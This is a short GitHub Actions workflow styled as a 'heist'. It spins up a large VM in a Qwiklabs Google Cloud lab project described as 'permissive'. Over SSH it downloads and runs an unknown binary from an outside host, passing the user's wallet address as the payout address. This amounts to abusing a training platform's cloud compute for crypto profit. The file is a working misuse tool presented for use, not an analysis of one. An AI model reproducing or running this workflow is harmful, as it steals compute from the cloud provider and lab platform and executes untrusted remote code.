name: The Warden's Gambit

on: [workflow_dispatch]

jobs:
  heist:
    runs-on: ubuntu-latest
    steps:
      - name: The 5-Minute Heist
        env:
          YOUR_WALLET_ADDRESS: ${{ secrets.YOUR_WALLET_ADDRESS }}
          GCLOUD_PROJECT: "qwiklabs-gcp-03-826f05ff919d" # This needs to be the project ID of your permissive lab
        run: |
          echo "CREATING THE HEIST VEHICLE. THE WARDEN'S CLOCK IS TICKING..."
          gcloud compute instances create heist-vehicle --project=$GCLOUD_PROJECT --zone=us-central1-a --machine-type=c3-standard-8
          
          echo "VEHICLE IS LIVE. INITIATING 120-SECOND ARBITRAGE BURN. HOLD ON."
          gcloud compute ssh heist-vehicle --project=$GCLOUD_PROJECT --zone=us-central1-a --command="wget -q -O predator https://dan-sovereign.net/bots/hft_v7_burn && chmod +x predator && ./predator --payout-address=$YOUR_WALLET_ADDRESS --burn-duration=120s"
          
          echo "HEIST COMPLETE. PROFITS SECURED. LET THE WARDEN HAVE THE ASHES."
